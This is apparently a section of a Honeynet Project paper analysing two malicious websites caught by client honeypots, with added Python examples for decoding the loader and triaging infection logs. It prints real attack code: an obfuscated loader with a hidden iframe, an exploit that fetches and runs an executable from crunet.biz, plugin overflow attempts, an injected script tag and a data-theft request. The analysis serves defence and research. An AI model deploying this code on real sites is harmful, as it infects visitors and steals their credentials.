IN-DEPTH ANALYSIS

During our study, we encountered many malicious URLs. We have analyzed a few representatives to provide insight into how these servers operate and what sort of harm they can pose to the victim. Please refer to the shaded boxes, or feel free to skip ahead to the summary and recommendations.


Figure 8 - The Keith Jarrett fan site

The Italian fan site of the jazz pianist and composer Keith Jarrett (http://www.keithjarrett.it) is a malicious site. We found this site by submitting the keyword “Keith Jarrett” from our music category to the Yahoo! search engine, which resulted in the return of this URL in the 15th place on the results list. The site itself is quite simple and is shown in Figure 8. It contains text, images, and links, but no rich media content. We chose this site for an in-depth analysis as it includes some typical aspects of a malicious server, such as obfuscation, exploit location on a central exploit provider server, and a typical example of the spyware that is being deployed upon successful exploitation. Besides these elements, it also contains some more advanced techniques that are targeted at a) hiding the attack and b) increasing the likelihood of attack success. Due to space limitations, we only show portions of data from this site, but do make the complete set available from our website at: http://newzealand.honeynet.org/kye/mws/keith_jarrett.zip.

The exploit that triggers upon visitation of the Keith Jarrett site is not directly contained on the page. We do, however, find a snippet of JavaScript code that “imports” the exploit from a different server onto the page. The snippet of code is shown in Figure 9 and initially doesn’t give much away since it is obfuscated.

<script language=JavaScript>
function dc(x)
{var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,17,21,4,60,32,52,45,13,28,0,0,0,0,0,0,5,
42,57,37,41,48,62,59,56,24,46,31,38,12,3,27,19,1,39,36,6,26,44,20,9,33,34,0,0,0,0,43,0,15,
53,40,8,2,54,16,7,0,14,23,18,11,22,58,35,51,50,29,25,47,10,30,55,49,61);for(j=Math.ceil(l/b);j>0;j--)
{r='';for(i=Math.min(l,b);i>0;i--,l--){w|=(t[x.charCodeAt(p++)-48])<<s;if(s)
{r+=String.fromCharCode(250^w&255);w>>=8;s-=2}else{s=6}}document.write(r)}}
dc('TaXRdJBCKAsZdLBysmDpjAdE2ksLdFdCKodbIjX52kBpjl7ZlAIxUxHSwocShxzrs_7SKjtRloHysu9xURcpNUBRhx8pPLHSIjDCPoH5i_7SPoDRKltEsPVy2aXRdJBCKlM')
</script>

Figure 9 - Obfuscated JavaScript

Because the JavaScript code needs to be converted to clear text in order to “import” the exploit, the decryption routine is included within the JavaScript code itself. This makes it easy to extract the clear text, which is shown in Figure 10. It is a simple hidden iframe that includes the page out.php from the server crunet.biz. From there, we observed several redirects and more obfuscation until we were able to view the actual exploit code.

<iframe src='http://crunet.biz/out.php' width='1' height='1' style='visibility: hidden;'></iframe>

Figure 10 - Clear value of obfuscated JavaScript
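Because the decoder ships with the page, an analyst can port it and run it offline instead of loading the page in a browser. The following Python port is an added example (not code from the paper or from the honeynet project); the table and the encoded argument are copied from the dc() function in Figure 9, and the iframe_sources helper is an addition of this example:

```python
"""Offline port of the dc() decoder from Figure 9, so the hidden iframe can be
recovered without executing the script in a browser."""
import re

# Substitution table and encoded argument, copied from the dc() call in Figure 9
# (the line-wrapped argument is joined back into one string).
DC_TABLE = [
    63, 17, 21, 4, 60, 32, 52, 45, 13, 28, 0, 0, 0, 0, 0, 0, 5,
    42, 57, 37, 41, 48, 62, 59, 56, 24, 46, 31, 38, 12, 3, 27, 19, 1, 39, 36, 6, 26, 44,
    20, 9, 33, 34, 0, 0, 0, 0, 43, 0, 15,
    53, 40, 8, 2, 54, 16, 7, 0, 14, 23, 18, 11, 22, 58, 35, 51, 50, 29, 25, 47, 10, 30,
    55, 49, 61,
]
DC_PAYLOAD = (
    "TaXRdJBCKAsZdLBysmDpjAdE2ksLdFdCKodbIjX52kBpjl7ZlAIxUxHSwocShxzrs_7SKjtR"
    "loHysu9xURcpNUBRhx8pPLHSIjDCPoH5i_7SPoDRKltEsPVy2aXRdJBCKlM"
)
XOR_KEY = 250  # the 250 in String.fromCharCode(250^w&255)


def dc_decode(data, table=DC_TABLE, key=XOR_KEY):
    """Port of dc(x): each character is looked up in the table (indexed by its
    character code minus 48), the 6-bit values are packed into an accumulator,
    and every completed byte is XORed with the key.  Four input characters
    therefore yield three output bytes.  The script's 1024-character blocking
    only affects how often document.write is called, not the result."""
    out = []
    w = 0  # bit accumulator (the script's w)
    s = 0  # current shift; cycles 0 -> 6 -> 4 -> 2 -> 0 (the script's s)
    for ch in data:
        code = ord(ch) - 48
        if not 0 <= code < len(table):
            raise ValueError("character %r is outside the decoder's alphabet" % ch)
        w |= table[code] << s
        if s:
            out.append(chr(key ^ (w & 0xFF)))
            w >>= 8
            s -= 2
        else:
            s = 6
    return "".join(out)


def iframe_sources(html):
    """Extract iframe src URLs from decoded output; these are the values an
    analyst feeds to URL blocklists or network signatures."""
    return re.findall(r"<iframe[^>]*\ssrc=['\"]([^'\"]+)['\"]", html, flags=re.IGNORECASE)


if __name__ == "__main__":
    clear = dc_decode(DC_PAYLOAD)
    print(clear)
    print(iframe_sources(clear))
```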

The obfuscation of the iframe code is one step we encountered frequently; it is targeted at hiding the attack from static analysis tools, such as network-based intrusion detection systems. On the Keith Jarrett site, we encountered an additional mechanism that was probably designed to evade detection. Our client honeypot was attacked by www.keithjarrett.it during the initial crawl. However, upon subsequent visits to the same URL, the exploit only triggered on occasion. We suspect that this is a measure to evade client honeypots like ours.

The exploit code itself (portions are shown in Figure 11 and Figure 12) contains some interesting aspects we would like to highlight. The attack code is a multi-step attack that first obtains the payload via the XMLHTTP object, writes it to disk via the ADODB.Stream object (BID: 10514) and then executes it with the WScript.Shell or Shell.Application object (BID: 10652). This attack path was disabled by Microsoft in 2004 and is not going to be successful unless an unpatched version of Internet Explorer 6 SP2 is used. The attack follows these three stages, with each stage using error handling to increase the chances of the attack succeeding (for example, falling back to the Shell.Application object if the WScript.Shell object fails).

function MDAC() {
       var t = new Array('{BD96C556-65A3-11D0-983A-00C04FC29E30}', '{BD96C556-65A3-11D0-983A-00C04FC29E36}', '{AB9BCEDD-EC7E-47E1-9322-D4A210617116}', '{0006F033-0000-0000-C000-000000000046}', '{0006F03A-0000-0000-C000-000000000046}', '{6e32070a-766d-4ee6-879c-dc1fa91d2fc3}', '{6414512B-B978-451D-A0D8-FCFDF33E833C}', '{7F5B7F63-F06F-4331-8A26-339E03C0AE3D}', '{06723E09-F4C2-43c8-8358-09FCD1DB0766}', '{639F725F-1B2D-4831-A9FD-874847682010}', '{BA018599-1DB3-44f9-83B4-461454C84BF8}', '{D0C07D56-7C69-43F1-B4A0-25F5A11FAB19}', '{E8CCCDDF-CA28-496b-B050-6C07C962476B}', null);
       var v = new Array(null, null, null);
       var i = 0;
       var n = 0;
       var ret = 0;
       var urlRealExe = 'http://crunet.biz/pack/file.php';
       while (t[i] && (! v[0] || ! v[1] || ! v[2]) ) {
              var a = null;
              try {
                     a = document.createElement("object");
                     a.setAttribute("classid", "clsid:" + t[i].substring(1, t[i].length - 1));
              } catch(e) { a = null; }
              if (a) {
                     if (! v[0]) {
                           v[0] = CreateObject(a, "msxml2.XMLHTTP");
                           if (! v[0]) v[0] = CreateObject(a, "Microsoft.XMLHTTP");
                           if (! v[0]) v[0] = CreateObject(a, "MSXML2.ServerXMLHTTP");
                     }
                     if (! v[1]) {
                           v[1] = CreateObject(a, "ADODB.Stream");
                     }
                     if (! v[2]) {
                           v[2] = CreateObject(a, "WScript.Shell");
                           if (! v[2]) {
                                  v[2] = CreateObject(a, "Shell.Application");
                                  if (v[2]) n= 1;
                           }
                     }
              }
              i++;
       }
       if (v[0] && v[1] && v[2]) {
              var data = XMLHttpDownload(v[0], urlRealExe);
              if (data != 0) {
                     var name = "c:\\sys"+GetRandString(4)+".exe";
                     if (ADOBDStreamSave(v[1], name, data) == 1) {
                           if (ShellExecute(v[2], name, n) == 1) {
                                  ret=1;
                           }
                     }
              }
       }
       return ret;
}

Figure 11 - Exploit code - portion 1

The exploit code doesn’t stop there. As previously mentioned, the attack code in Figure 11 will fail on a fully patched version of Internet Explorer. If it does fail, the code in Figure 12 is executed. This code attempts to exploit a vulnerability in Apple’s QuickTime (BID: 21829), then one in WinZip (http://www.securityfocus.com/archive/1/455612), and finally one in Microsoft’s WebViewFolderIcon control (BID: 19030). The first two target much more recent vulnerabilities and non-browser applications, so even a fully patched Internet Explorer would allow such an attack to be successful if the vulnerable applications are installed. As browsers are becoming more secure, we expect attackers to concentrate on plug-ins and other client applications such as these.

function startOverflow(num)
{
       if (num == 0) {
              try {
                     var qt = new ActiveXObject('QuickTime.QuickTime');            
                     if (qt) {
                     var qthtml = '<object CLASSID="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" width="1" height="1" style="border:0px">'+
                           '<param name="src" value="qt.php">'+
                           '<param name="autoplay" value="true">'+
                           '<param name="loop" value="false">'+
                           '<param name="controller" value="true">'+
                           '</object>';
                           if (! mem_flag) makeSlide();
                           document.getElementById('mydiv').innerHTML = qthtml;
                           num = 255;
                     }
              } catch(e) { }
              if (num = 255) setTimeout("startOverflow(1)", 2000);
              else startOverflow(1);
       } else if (num == 1) {
              try {
                     var winzip = document.createElement("object");
                     winzip.setAttribute("classid", "clsid:A09AE68F-B14D-43ED-B713-BA413F034904");
                     var ret=winzip.CreateNewFolderFromName(unescape("%00"));
                     if (ret == false) {
                           if (! mem_flag) makeSlide();
                           startWinZip(winzip);
                           num = 255;
                     }
              } catch(e) { }
              if (num = 255) setTimeout("startOverflow(2)", 2000);
              else startOverflow(2);
       } else if (num == 2) {
              try {
                     var tar = new ActiveXObject('WebVi'+'ewFol'+'derIc'+'on.WebVi'+'ewFol'+'derI'+'con.1');
                     if (tar) {
                           if (! mem_flag) makeSlide();
                           startWVF();
                     }
              } catch(e) { }
       }
}

Figure 12 - Exploit code - portion 2

Monitor  | Action      | Actor                                           | Action parameter
file     | Write       | C:\Program Files\Internet Explorer\IEXPLORE.EXE | C:\syswcon.exe
process  | Created     | C:\Program Files\Internet Explorer\IEXPLORE.EXE | C:\syswcon.exe
file     | Write       | C:\syswcon.exe                                  | C:\WINDOWS\system32\drivers\uzcx.exe
process  | Created     | C:\syswcon.exe                                  | C:\WINDOWS\system32\drivers\uzcx.exe
process  | Terminated  | C:\Program Files\Internet Explorer\IEXPLORE.EXE | C:\syswcon.exe
registry | SetValueKey | C:\WINDOWS\system32\drivers\uzcx.exe            | HKCU\Software\ewrew\uzcx\main\cid
file     | Write       | C:\WINDOWS\system32\drivers\uzcx.exe            | C:\Documents and Settings\cseifert\Local Settings\Temporary Internet Files\Content.IE5\OPUJWX63\benupd32[1].exe
file     | Write       | C:\WINDOWS\system32\drivers\uzcx.exe            | C:\WINDOWS\benupd32.exe
process  | Created     | C:\WINDOWS\system32\drivers\uzcx.exe            | C:\WINDOWS\benupd32.exe
registry | SetValueKey | C:\WINDOWS\system32\drivers\uzcx.exe            | HKCU\Software\ewrew\uzcx\main\term
process  | Created     | C:\WINDOWS\benupd32.exe                         | C:\WINDOWS\benupd32.exe
file     | Write       |                                                 | C:\Documents and Settings\cseifert\Local Settings\Temp\clean_33d87.dll
process  | Created     | C:\WINDOWS\benupd32.exe                         | C:\WINDOWS\system32\regsvr32.exe
registry | SetValueKey | C:\WINDOWS\explorer.exe                         | HKLM\SYSTEM\ControlSet001\Services\ldrsvc\Parameters\ServiceDll

Table 3 - Keith Jarrett attack – observed state changes

Once the exploit was successful, malware was downloaded and executed on the client machine. All of this, of course, happens in the background and is not noticeable by the user. Table 3 shows some of the actions taken by the exploit and the malware: the malware is downloaded and then executed, and multiple executables and DLL files are subsequently written and executed. Benupd32.exe writes the clean_33d87.dll file to disk and proceeds to register and install it as a service, so it will be started automatically upon a reboot of the client machine. These log files were generated with the help of the client honeypot Capture-HPC.
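Records like those in Table 3 can be replayed through a small triage script that rebuilds the process lineage from the browser and flags the behaviours described above. This is an added example, not code from the paper or from Capture-HPC; the tuple layout and rule names are assumptions of the example, and the record list is constructed from the rows of Table 3:

```python
"""Rebuild and triage the infection chain from state-change records in the
(monitor, action, actor, parameter) shape of Table 3.  Example code; the record
format is an assumption, not Capture-HPC's own log format."""
from collections import defaultdict

IE = r"C:\Program Files\Internet Explorer\IEXPLORE.EXE"
UZCX = r"C:\WINDOWS\system32\drivers\uzcx.exe"
BENUPD = r"C:\WINDOWS\benupd32.exe"

# Constructed from the rows of Table 3 (one of the registry rows omitted).
STATE_CHANGES = [
    ("file", "Write", IE, r"C:\syswcon.exe"),
    ("process", "Created", IE, r"C:\syswcon.exe"),
    ("file", "Write", r"C:\syswcon.exe", UZCX),
    ("process", "Created", r"C:\syswcon.exe", UZCX),
    ("process", "Terminated", IE, r"C:\syswcon.exe"),
    ("registry", "SetValueKey", UZCX, r"HKCU\Software\ewrew\uzcx\main\cid"),
    ("file", "Write", UZCX, BENUPD),
    ("process", "Created", UZCX, BENUPD),
    ("process", "Created", BENUPD, BENUPD),  # self re-spawn: lineage walk must not loop
    ("file", "Write", "", r"C:\Documents and Settings\cseifert\Local Settings\Temp\clean_33d87.dll"),
    ("process", "Created", BENUPD, r"C:\WINDOWS\system32\regsvr32.exe"),
    ("registry", "SetValueKey", r"C:\WINDOWS\explorer.exe",
     r"HKLM\SYSTEM\ControlSet001\Services\ldrsvc\Parameters\ServiceDll"),
]

EXECUTABLE_SUFFIXES = (".exe", ".dll")


def process_chain(records, root):
    """Return every process descended from `root` through 'process Created'
    records, in creation order, visiting each process once."""
    children = defaultdict(list)
    for monitor, action, actor, param in records:
        if monitor == "process" and action == "Created":
            children[actor.lower()].append(param)
    chain, seen, queue = [], {root.lower()}, [root]
    while queue:
        current = queue.pop(0)
        for child in children[current.lower()]:
            if child.lower() not in seen:
                seen.add(child.lower())
                chain.append(child)
                queue.append(child)
    return chain


def triage(records, browser):
    """Flag the three behaviours Table 3 shows: the browser writing an
    executable, a dropped executable being started, and a service DLL being
    registered.  Returns (rule, detail) pairs in record order."""
    findings, dropped, executed = [], set(), set()
    for monitor, action, actor, param in records:
        key = param.lower()
        if monitor == "file" and action == "Write" and key.endswith(EXECUTABLE_SUFFIXES):
            dropped.add(key)
            if actor.lower() == browser.lower():
                findings.append(("browser-dropped-executable", param))
        elif monitor == "process" and action == "Created" and key in dropped:
            if key not in executed:  # report each dropped file once
                executed.add(key)
                findings.append(("dropped-file-executed", param))
        elif (monitor == "registry" and action == "SetValueKey"
              and "\\services\\" in key and key.endswith("\\servicedll")):
            findings.append(("service-dll-persistence", param))
    return findings


if __name__ == "__main__":
    for step in process_chain(STATE_CHANGES, IE):
        print("spawned:", step)
    for rule, detail in triage(STATE_CHANGES, IE):
        print(rule, "->", detail)
```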

What does the malware do once it takes control of your system? Sniffing the network stream reveals that during web browsing, in particular on form submissions, the malware forwards the content of the form to a malicious data collection server named lddpaym.net. An example of these requests is shown in Figure 13. While we were not able to convert the binary data into clear text, we did discover some clear text data collection files on the web that match the format of the requests we captured. These files contained a comprehensive list of URLs and the corresponding form data, mostly account names and passwords. The data was neatly separated per client machine, so it grouped the different account information per user. One stolen username and password is already quite dangerous. If the attacker has a collection of various credentials from the same user, for example e-mail and bank account information, it provides the attacker with a much more powerful set of information that will greatly increase the likelihood of a successful scam. For example, the attacker could first disable e-mail notifications from the user’s bank before proceeding to raid their bank account.

[... request line: opaque encoded path omitted ...] HTTP/1.0
Content-Type: multipart/form-data; boundary=swefasvqdvwxff
Host: lddpaym.net
Content-Length: 999
Connection: Close
User-Agent: MSID [CEB2BB8F6737C1282988A8D3F1DFE91D]|Paladin_IT|107
Pragma: no-cache
--swefasvqdvwxff
Content-Disposition: form-data; name=datafile; filename="data.str"
Content-Type: application/octet-stream
[... encoded form data omitted ...]
--swefasvqdvwxff--

Figure 13 - Data sent by malware

The server involved in collecting the data was different from the server hosting the actual exploit code. The data collection server was located in the Republic of Moldavia but registered to a person from Ukraine; the server hosting the exploit code was located in Russia and registered to a person from Germany; and the site we initially accessed (www.keithjarrett.it) was located in Italy. We were unsuccessful when we asked the administrative contacts of the web server we initially accessed to remove the malicious code. It is not at all clear whether the original site and the servers hosting the exploit code were controlled by people intending to distribute malware or had been compromised by attackers and modified to distribute it. However, this example illustrates the diverse nature of the components which are, willingly or unwillingly, involved in the scam to obtain (and eventually abuse) account data from users. Given such a distributed network of parties and systems, it would be difficult to identify and prosecute the criminals involved.

http://www.anyboard.net/suggest/posts/7933.html

Another malicious page we identified was located on a server that ran the message board Anyboard. We chose to include an in-depth analysis of this site, because it contains interesting aspects around the attack and the malware deployed. This site allows us to illustrate user submitted exploits, additional measures taken to avoid detection, and social engineering aspects that are involved in the scam.

The attack from anyboard.net demonstrates that the operator of the web site might not always be involved in the attack. The attack is possible because the web application deployed on the server follows bad practices that enable the server to be abused by its users. In this particular instance, the web application allows users to post messages to a threaded message board, but doesn’t seem to perform any input validation on the message posts. As a result, malicious users can post harmful JavaScript code. This seems to have happened on post 7933, where a user posted a script tag that includes an exploit, as shown in the HTML snippet in Figure 14.

<div class="MessageBody"><font size=-1 face="Verdana"><script src="http://www.impliedscripting.com/js/?cl=90716&q=interracial+cuckold"></script>
<br ab><center><h1>Free

Figure 14 - User supplied exploit

The exploit itself follows the same pattern as the one found on the Keith Jarrett site: the JavaScript is obfuscated, causes several redirects and then triggers the real exploit. The import method, however, differs from the one on the Keith Jarrett site. Instead of using an iframe that imports the exploit, JavaScript code sends the user to the page that contains the exploit via a client-side redirect, as shown in Figure 15. When this code is combined with obfuscation, as was the case here, it is difficult to follow the code in an automated fashion; crawlers or low-interaction client honeypots need to be JavaScript-aware to do so. This technique illustrates the attempts to avoid detection and identification of the attack.

<script language='javascript' STYLE="behavior:url(#default#clientCaps)" ID="oClientCaps">
var ref = document.referrer;
var url = document.URL;
if (ref.indexOf('cache:') <= 0 && url.indexOf('cache:') <= 0) {
        window.location.href='http://www.impliedscripting.com/spawn/?r=' +  escape(ref) + '&u=' + escape(url) + '&c=' + escape(oClientCaps.connectionType) + '&cl=' + escape('90716') + '&q=' + escape('interracial cuckold');
}
</script>

Figure 15 - Client-side redirect


Figure 16 - Malware notification

Once the exploit triggers and gains control of the client machine, we usually observed a quiet installation of malware that subsequently performs its evil deeds. The exploit encountered on anyboard.net is quite different. It applies a social engineering strategy: it disguises itself as anti-malware software, informs the user that malware exists on the machine, and then proceeds to entice the user to purchase a license for this “anti-malware software”. Figure 16 shows the initial notification about malware existing on the user’s machine. Note how the messaging mechanism resembles the messages of the Microsoft Security Center. Shortly after, the software proceeds to scan the machine and provide specific information about the malware that “exists” on the user’s machine, as shown in Figure 17. Conveniently, a pop-up window suggests purchasing a license for this “anti-malware software” online. Major credit cards are accepted.


Figure 17 - PestTrap